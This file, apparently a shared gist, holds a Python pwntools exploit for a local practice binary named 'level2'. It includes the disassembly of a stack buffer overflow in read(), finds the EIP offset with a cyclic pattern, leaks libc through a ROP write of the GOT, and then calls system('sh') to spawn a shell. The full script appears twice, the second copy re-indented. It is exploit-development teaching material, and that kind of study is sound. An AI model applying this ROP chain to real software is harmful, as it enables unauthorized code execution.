zachriggle/win.py

## win.py
from pwn import *

# Here's the disassembly for everything
"""
0804844b <vulnerable_function>:
 804844b:       55                      push   ebp
 804844c:       89 e5                   mov    ebp,esp
 804844e:       81 ec 88 00 00 00       sub    esp,0x88
 8048454:       83 ec 04                sub    esp,0x4
 8048457:       68 00 01 00 00          push   0x100
 804845c:       8d 85 78 ff ff ff       lea    eax,[ebp-0x88]
 8048462:       50                      push   eax
 8048463:       6a 00                   push   0x0
 8048465:       e8 a6 fe ff ff          call   8048310 <read@plt>
 804846a:       83 c4 10                add    esp,0x10
 804846d:       c9                      leave
 804846e:       c3                      ret

0804846f <main>:
 804846f:       8d 4c 24 04             lea    ecx,[esp+0x4]
 8048473:       83 e4 f0                and    esp,0xfffffff0
 8048476:       ff 71 fc                push   DWORD PTR [ecx-0x4]
 8048479:       55                      push   ebp
 804847a:       89 e5                   mov    ebp,esp
 804847c:       51                      push   ecx
 804847d:       83 ec 04                sub    esp,0x4
 8048480:       e8 c6 ff ff ff          call   804844b <vulnerable_function>
 8048485:       83 ec 04                sub    esp,0x4
 8048488:       6a 0d                   push   0xd
 804848a:       68 30 85 04 08          push   0x8048530
 804848f:       6a 01                   push   0x1
 8048491:       e8 aa fe ff ff          call   8048340 <write@plt>
 8048496:       83 c4 10                add    esp,0x10
 8048499:       8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
 804849c:       c9                      leave
 804849d:       8d 61 fc                lea    esp,[ecx-0x4]
 80484a0:       c3                      ret
"""

# Load the ELF from disk so we can grab libc
elf = ELF('./level2')
libc = elf.libc

# Determine where stack control is by forcing a core dump.
io = process('./level2')
io.sendline(cyclic(1024))
io.recvall()

core = Core('core')

eip  = cyclic_find(core.eip)
log.info("EIP control @ %i" % eip)

# Actually exploit the process this time
io = process('./level2')

# Create a ROP stack to dump the GOT and return to main()
# so we can exploit again.
rop = ROP(elf)
rop.write(1, elf.got['read'], 4)
rop.main()
print rop.dump()

io.send(fit({
    eip: str(rop)
}))

# Get the address of 'read'
read = io.unpack()

# Adjust libc against that offset
libc.address = read - libc.symbols['read']

# Get the address of system(), and build our new ROP stack.
system = libc.symbols['system']
binsh  = libc.search('sh\x00').next()

rop = ROP(libc)
rop.system(binsh)

# Send the second ROP which gets us a shell.
io.send(fit({
    eip: str(rop)
}))

io.interactive()
	from pwn import *

	# Here's the disassembly for everything
	"""
	0804844b <vulnerable_function>:
	804844b: 55 push ebp
	804844c: 89 e5 mov ebp,esp
	804844e: 81 ec 88 00 00 00 sub esp,0x88
	8048454: 83 ec 04 sub esp,0x4
	8048457: 68 00 01 00 00 push 0x100
	804845c: 8d 85 78 ff ff ff lea eax,[ebp-0x88]
	8048462: 50 push eax
	8048463: 6a 00 push 0x0
	8048465: e8 a6 fe ff ff call 8048310 <read@plt>
	804846a: 83 c4 10 add esp,0x10
	804846d: c9 leave
	804846e: c3 ret

	0804846f <main>:
	804846f: 8d 4c 24 04 lea ecx,[esp+0x4]
	8048473: 83 e4 f0 and esp,0xfffffff0
	8048476: ff 71 fc push DWORD PTR [ecx-0x4]
	8048479: 55 push ebp
	804847a: 89 e5 mov ebp,esp
	804847c: 51 push ecx
	804847d: 83 ec 04 sub esp,0x4
	8048480: e8 c6 ff ff ff call 804844b <vulnerable_function>
	8048485: 83 ec 04 sub esp,0x4
	8048488: 6a 0d push 0xd
	804848a: 68 30 85 04 08 push 0x8048530
	804848f: 6a 01 push 0x1
	8048491: e8 aa fe ff ff call 8048340 <write@plt>
	8048496: 83 c4 10 add esp,0x10
	8048499: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]
	804849c: c9 leave
	804849d: 8d 61 fc lea esp,[ecx-0x4]
	80484a0: c3 ret
	"""

	# Load the ELF from disk so we can grab libc
	elf = ELF('./level2')
	libc = elf.libc

	# Determine where stack control is by forcing a core dump.
	io = process('./level2')
	io.sendline(cyclic(1024))
	io.recvall()

	core = Core('core')

	eip = cyclic_find(core.eip)
	log.info("EIP control @ %i" % eip)

	# Actually exploit the process this time
	io = process('./level2')

	# Create a ROP stack to dump the GOT and return to main()
	# so we can exploit again.
	rop = ROP(elf)
	rop.write(1, elf.got['read'], 4)
	rop.main()
	print rop.dump()

	io.send(fit({
	eip: str(rop)
	}))

	# Get the address of 'read'
	read = io.unpack()

	# Adjust libc against that offset
	libc.address = read - libc.symbols['read']

	# Get the address of system(), and build our new ROP stack.
	system = libc.symbols['system']
	binsh = libc.search('sh\x00').next()

	rop = ROP(libc)
	rop.system(binsh)

	# Send the second ROP which gets us a shell.
	io.send(fit({
	eip: str(rop)
	}))

	io.interactive()